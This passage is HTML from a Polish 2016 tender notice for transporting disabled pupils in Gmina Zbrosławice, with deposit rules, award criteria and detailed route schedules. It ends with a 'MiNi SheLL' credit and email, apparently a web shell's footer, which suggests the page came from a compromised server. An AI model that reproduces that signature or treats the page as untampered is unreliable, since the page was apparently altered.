              </b><div style="padding-left: 20px"> - dokument(-y), np. zobowiązanie podmiotów, na zasobach których Wykonawca, którego oferta została najwyżej oceniona będzie polegał w trybie art. 22a uPzp, do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia, z treści których musi wynikać w szczególności:
1.zakres dostępnych Wykonawcy zasobów innego podmiotu,
2.sposób wykorzystania zasobów innego podmiotu, przez Wykonawcę, przy wykonywaniu zamówienia publicznego,
3.zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
4.czy podmiot, na zdolnościach którego Wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje usługi, których wskazane zdolności dotyczą
- w celu wstępnego potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu Zamawiający żąda od wszystkich Wykonawców: w terminie 3 dni od zamieszczenia na stronie internetowej informacji, o której mowa w art. 86 ust. 5 ustawy Pzp, oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowejo której mowa w art. 22 ust. 1 pkt 23 uPzp, zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />Wykonawca przystępujący do przetargu jest zobowiązany wnieść wadium w wysokości:
a) 4000,00 zł (słownie: cztery tysiące zł 00/100)  na część nr 1 zamówienia,
b) 1000,00 zł (słownie: jeden tysiąc zł 00/100)  na część nr 2 zamówienia,
 w formach określonych w art. 45 ust. 6 ustawy Pzp.
- Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek Zamawiającego: 
Bank Spółdzielczy  Tarnowskie Góry 61 8463 0005 2002 0020 1276 0011   z dopiskiem: Wadium  część nr 1 lub/  i nr 2.
- Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym  z uwzględnieniem art. 46 ust. 4 ustawy Pzp. Wskazane jest dołączenie do oferty kopii polecenia przelewu potwierdzonej przez Wykonawcę.
Uwaga! Wadium w tej formie uważa się za wniesione w sposób prawidłowy, gdy środki pieniężne wpłyną na konto Zamawiającego przed upływem terminu składnia ofert.
- Wadium wnoszone w postaci niepieniężnej należy złożyć w oryginalnym egzemplarzu bezpośrednio do oferty. Zaleca się zamieścić dokument wadialny w taki sposób, aby jego zwrot przez Zamawiającego nie naruszył integralności oferty i dołączonych oświadczeń wraz z dokumentami (np. umieszczony w koszulce, co pozwoli na swobodne oddzielenie wadium od reszty dokumentów)lub do oferty załączyć kserokopię natomiast oryginalny egzemplarz (np. zabezpieczony w koszulce) umieścić odrębnie w kopercie zawierającej ofertę. Wadium wnoszone w formie innej niż w pieniądzu musi spełniać wymagania wynikające z ustawy, w szczególności określać bezwarunkowy, nieodwołalny obowiązek zapłaty na pierwsze żądanie Zamawiającego, w przypadkach określonych w ustawie Pzp oraz być ważne przez okres związania ofertą, określony w niniejszej specyfikacji.
- Zwrot wadium - zgodnie z art. 46 ust. 1, 1a, 2 i 4  ustawy Pzp.
- Zatrzymanie wadium - zgodnie z art. 46 ust. 4a i 46 ust. 5 ustawy Pzp.
- Zamawiający żąda ponownego wniesienia wadium przez Wykonawcę, któremu zwrócono wadium na podstawie art. 46 ust. 1 uPzp, jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez Zamawiającego.
- Oferty Wykonawców, którzy nie wniosą wadium lub wniosą w sposób nieprawidłowy zostaną odrzucone [art. 89 ust. 1 pkt 7b uPzp]		
8.1.9 Ważność wadium w formie niepieniężnej winna obejmować cały okres związania ofertą.
</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr><tr><td>doświadczenie osób realizujących zamówienie - kierowcy</td><td>20</td></tr><tr><td>doświadczenie osób realizujących zamówienie - opiekunowie</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px">Wzory/projekty umów stanowią kolejno:
Załącznik nr 8 A - Projekt umowy  część nr 1
Załącznik nr 8 B - Projekt umowy  część nr 2
</div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />W trybie art. 144 ustawy Prawo zamówień publicznych dopuszcza się zmianę niniejszej umowy w następujących przypadkach: 
1)zmiany ilości uczniów niepełnosprawnych dowożonych do szkół i przedszkoli (placówek), do których zaistnieje konieczność transportu, na podstawie wniosków rodziców/opiekunów prawnych o dowóz uczniów do szkół/przedszkoli (placówek) złożonych po dacie ogłoszenia SIWZ,
2)zmian tras spowodowanych zmianą ilości dowożonych uczniów lub zmianą adresów zamieszkania dowożonych uczniów co powoduje zmiany w przewidzianej liczbie km, 
3)	zmiany szkół i przedszkoli (placówek), do których zaistnieje konieczność transportu uczniów niepełnosprawnych na podstawie wniosków rodziców/opiekunów prawnych o dowóz do szkół/przedszkoli (placówek) złożonych po dacie ogłoszenia SIWZ,
4) zmian adresów siedziby szkół/ przedszkoli (placówek), do których są dowożeni uczniowie  oraz zmian adresów siedziby stron umowy,
5) ukończenie przez ucznia nauki w danej placówce określonej w ZADANIU NR I i II lub rezygnacja przez rodzica/prawnego opiekuna z dowozu ucznia do placówki określonej w ZADANIU NR I i II w sytuacji gdy uczeń był tylko jedynym dowożonym uczniem z danej miejscowości, zmniejsza się liczbę kilometrów, za które WYKONAWCA otrzyma wynagrodzenie lub ulega likwidacji dana trasa. Zmniejszenie lub likwidacja trasy następuje od kolejnego dnia roboczego następującego po dniu,w którym nastąpiła rezygnacja. O konieczności zmiany trasy i zmniejszenia liczby kilometrów lub likwidacji trasy Zamawiający informuje Wykonawcę telefonicznie, co następnie zostanie potwierdzone pisemnie w ciągu 3 dni roboczych od wystąpienia w/w rezygnacji,
6) wprowadzenie zmian w planie zajęć przez placówki określone w ZADANIU I i II, do których są dowożeni uczniowie,
7) zmiana osób realizujących zamówienie ze strony WYKONAWCY (opiekunów lub/i kierowców),
8)zmiana środków transportu, którymi posługuje się WYKONAWCA w trakcie realizacji zamówienia,
9)zmiana całkowitego wynagrodzenia Wykonawcy, które może ulec zmianie w zależności od liczby przejechanych kilometrów w związku z możliwymi zmianami tras przewidzianymi  w pkt od 1 do 6,
10)zmiana ceny brutto za 1 km oraz całkowitego wynagrodzenia WYKONAWCY z uwagi na ustawową zmianę stawki podatku VAT.
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 12/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              j. polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Dowóz uczniów niepełnosprawnych z terenu Gminy Zbrosławice  wraz z opiekunami do szkół i przedszkoli (placówek) w 2017 r.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZAMAWIAJĄCY powierza a WYKONAWCA przyjmuje do wykonania usługę polegającą na przewozie uczniów niepełnosprawnych na zajęcia z miejsca zamieszkania w dni nauki szkolnej w 2017 roku określone w rozporządzeniu MENiS z dnia 18 kwietnia 2002 r. w sprawie organizacji roku szkolnego  (Dz. U. Nr 46, poz. 432 z późn. zm.), od dnia 02.I.2017 r. do dnia 22.XII.2017 r. (dowóz od poniedziałku do piątku z wyłączeniem ferii i innych dni wolnych od zajęć szkolnych) zgodnie z trasami nr 1, 2 i 3:

1.1 Trasa nr 1  Liczba przewożonych uczniów    10 + opiekun 
Przebieg dzienny środka transportu określa się na 126km

DOWOZY - przebieg trasy wraz z kolejnością wsiadania uczniów do środka transportowego w trakcie dowozu do szkół (placówek) 
Szałsza  Ziemięcice  Łubie  Księży Las  Kamieniec  Zbrosławice  Wieszowa  Tarnowskie Góry Specjalny Ośrodek Szkolno  Wychowawczy ul. Strzelców Bytomskich 7  Radzionków Zespół Szkół Specjalnych ul. Nałkowskiej  2      

Godziny dowozów dzieci z domu na zajęcia : 
1.Tarnowskie Góry Specjalny Ośrodek Szkolno - Wychowawczy ul. Strzelców Bytomskich 7 na godz. 7:30 
2.Radzionków Zespół Szkół Specjalnych ul. Nałkowskiej 2  na godz. 7 55			
ODWOZY - przebieg trasy wraz z kolejnością wysiadania uczniów ze środka transportowego w trakcie odwozu do domu po zajęciach 
Radzionków Zespół Szkół Specjalnych  Tarnowskie Góry Specjalny Ośrodek Szkolno  Wychowawczy  Rybna Gimnazjum Publiczne nr 5  Wieszowa  Zbrosławice  Kamieniec  Księży Las  Łubie  Ziemięcice  Szałsza

Godziny odwozów dzieci do domu po zajęciach: 

1.Radzionków Zespół Szkół Specjalnych ul. Nałkowskiej 2  o godz. 14 05	
2.Tarnowskie Góry Specjalny Ośrodek Szkolno - Wychowawczy ul. Strzelców Bytomskich 7  o godz. 14 25 
3.Rybna Gimnazjum Publiczne nr 5  ul.  o godz. 14 40

Szacunkowa liczba kilometrów w okresie od 2.I.2017 r. do 22.XII.2017 r. na trasie Nr 1 wynosi 23.562 km

1.2 Trasa nr 2  Liczba przewożonych uczniów    7 + opiekun  
(przewóz 3 uczniów korzystających z wózków inwalidzkich)
Przebieg dzienny środka transportu określa się na 73 km                

DOWOZY - przebieg trasy wraz z kolejnością wsiadania uczniów do środka transportowego            w trakcie dowozu do szkoły
Przezchlebie  Ziemięcice  Zbrosławice  Rybna Gimnazjum Publiczne nr 5  Wilkowice  Zbrosławice  Zawada  Pyskowice Zespół Szkół Specjalnych ul. Poniatowskiego 2  

Godziny dowozów uczniów z domu na zajęcia: 
Rybna Gimnazjum Publiczne nr 5  na godz. 7 20
Pyskowice Zespół Szkół Specjalnych ul. Poniatowskiego 2  na godz. 7 50

ODWOZY - przebieg trasy wraz z kolejnością wysiadania uczniów ze środka transportowego w trakcie odwozu do domu po zajęciach 
Pyskowice Zespół Szkół Specjalnych ul. Poniatowskiego 2  Zawada  Zbrosławice  Wilkowice  Zbrosławice  Ziemięcice  Przezchlebie  

Godziny odwozów uczniów do domu po zajęciach: 
Pyskowice Zespół Szkół Specjalnych ul. Poniatowskiego 2  o godz. 15 00      

 Na trasie nr 2 z dowozu korzysta 2 uczniów niepełnosprawnych poruszających się na wózku inwalidzkim. Do obowiązków opiekuna należy pomoc przy wsiadaniu i wysiadaniu w/w uczniów, w tym w trakcie przesiadania w/w uczniów z wózka na miejsce w samochodzie a także pomoc polegająca na przeniesieniu uczniów do i z samochodu na wózek inwalidzki. Szkoła zapewnia opiekuna, który odbiera uczniów rano i zawozi na wózkach do szkoły oraz odwozi uczniów po zajęciach do samochodu (brak konieczności przewozu wózków inwalidzkich w pojeździe, gdyż wózki dla tych uczniów znajdują się w szkole).

Szacunkowa liczba kilometrów w okresie od 2.I.2017 r. do 22.XII.2017 r. na trasie Nr 2 wynosi 13.651 km 

1.3 Trasa nr 3  Liczba przewożonych uczniów   2 + opiekun 
Przebieg dzienny środka transportu określa się na 67km                               

DOWOZY - przebieg trasy wraz z kolejnością wsiadania uczniów do środka transportowego w trakcie dowozu do szkoły
Zbrosławice   Wieszowa  Zabrze ZS nr 20 ul. Gagarina 2  Bytom Szkoła Podstawowa Nr 4 ul. Chrobrego 9 

Godziny dowozów uczniów z domu na zajęcia: 
1.Zabrze ZS nr 20 ul. Gagarina 2  na godz. 7 20
2.Bytom Szkoła Podstawowa Nr 4 ul. Chrobrego 9  na godz. 7 55

ODWOZY - przebieg trasy wraz z kolejnością wysiadania uczniów ze środka transportowego w trakcie odwozu do domu po zajęciach
Bytom Szkoła Podstawowa Nr 4 ul. Chrobrego 9  Zabrze ZS nr 20 ul. Gagarina 2  Wieszowa  Ptakowice  Zbrosławice   

Godziny odwozu uczniów do domu po zajęciach: 
1.Bytom Szkoła Podstawowa Nr 4 ul. Chrobrego 9  o godz. 13 45 
2.Zabrze ZS nr 20 ul. Gagarina 2  o godz. 14 25 

W dniach, w których z dowozu/odwozu korzysta tylko uczeń uczęszczający: 
- do ZS nr 20 w Zabrzu  - dzienny przebieg środka transportu określa się na 27 km;
- do Szkoły Podstawowej Nr 4 w Bytomiu - dzienny przebieg środka transportu określa się na 23,5 km

Szacunkowa liczba kilometrów w okresie od 2.I.2017 r. do 22.XII.2017 r. na trasie Nr 3 wynosi 12.529 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60130000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 02/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr><tr><td>doświadczenie osób realizujących zamówienie - kierowcy</td><td>20</td></tr><tr><td>doświadczenie osób realizujących zamówienie - opiekunowie</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Dowóz uczniów niepełnosprawnych z terenu Gminy Zbrosławice  wraz z opiekunami do szkół i przedszkoli (placówek) w 2017 r.<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>ZAMAWIAJĄCY powierza a WYKONAWCA przyjmuje do wykonania usługę polegającą na przewozie uczniów niepełnosprawnych na zajęcia z miejsca zamieszkania w dni nauki szkolnej od dnia 02.I.2017 r. do dnia 22.XII.2017 r. od poniedziałku do piątku z wyłączeniem ferii i innych dni wolnych od zajęć szkolnych  zgodnie z Rozporządzeniem MENiS z dnia 18 kwietnia 2002r. w sprawie organizacji roku szkolnego  (Dz. U. Nr 46, poz. 432 z późn. zm.), za wyjątkiem dowozu do przedszkola w Przezchlebiu  (termin wykonania zamówienia od dnia 02.I.2017 r. do dnia 29.XII.2017 r. za wyjątkiem dni ustawowo wolnych oraz przerwy wakacyjnej w lipcu                    i sierpniu 2017 r.), zgodnie z trasami  nr 4 i 5:        

2.1 Trasa nr 4  Liczba przewożonych uczniów   2 + opiekun 
Przebieg dzienny środka transportu określa się na 22 km  

DOWOZY 
Ziemięcice  Ziemięcice Specjalny Ośrodek Szkolno - Wychowawczy ul. Mikulczycka 120 Ziemięcice  Gliwice Zespół Szkół Ogólnokształcących Specjalnych nr 7 ul. Gierymskiego 7 

Godziny dowozów ucznia z domu na zajęcia: 
Ziemięcice SOSW w Ziemięcicach   na godz. 7 15
Gliwice Zespół Szkół Ogólnokształcących Specjalnych nr 7 ul. Gierymskiego 7  na godz. 7 50

ODWOZY 
Gliwice Zespół Szkół Ogólnokształcących Specjalnych nr 7 ul. Gierymskiego 7  Ziemięcice
Godziny odwozów ucznia do domu po zajęciach: 
1.Poniedziałek, środa, czwartek i piątek
Gliwice Zespół Szkół Ogólnokształcących Specjalnych nr 7 ul. Gierymskiego  o godz. 1500
2.Wtorek 
Gliwice Zespół Szkół Ogólnokształcących Specjalnych nr 7 ul. Gierymskiego  o godz. 14 40
Ziemięcice SOSW ul. Mikulczycka 120  o godz. 15 40

Szacunkowa liczba kilometrów w okresie od 2.I.2017 r. do 22.XII.2017 r. na trasie Nr 4 wynosi 4.114 km

2.2  Trasa nr 5  Liczba przewożonych uczniów    3 + opiekun 
Przebieg dzienny środka transportu  określa się na km 33 km

DOWOZY - przebieg trasy wraz z kolejnością wsiadania uczniów do środka transportowego w trakcie dowozu do placówki
Wieszowa  Kamieniec  Przezchlebie   Przezchlebie Gminne Przedszkole Nr 8 ul. Mikulczycka 11

Godziny dowozów uczniów z domu na zajęcia 
Przezchlebie Gminne Przedszkole Nr 8 ul. Mikulczycka 11  na godz. 9 00

ODWOZY - przebieg trasy wraz z kolejnością wysiadania uczniów ze środka transportowego w trakcie odwozu do domu po zajęciach 
Przezchlebie Gminne Przedszkole Nr 8 ul. Mikulczycka 11  Przezchlebie   Kamieniec  Wieszowa 

Godziny odwozów uczniów do domu po zajęciach: 
Poniedziałek, środa, czwartek i piątek  o godz. 14 00   
Wtorek  o godz. 15 00   
Szacunkowa liczba kilometrów w okresie od 2.I.2017 r. do 29.XII.2017 r. na trasie Nr 5 wynosi 6.864 km
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>60130000-8<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 29/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena brutto oferty</td><td>60</td></tr><tr><td>termin płatności faktury</td><td>10</td></tr><tr><td>doświadczenie osób realizujących zamówienie - kierowcy</td><td>20</td></tr><tr><td>doświadczenie osób realizujących zamówienie - opiekunowie</td><td>10</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com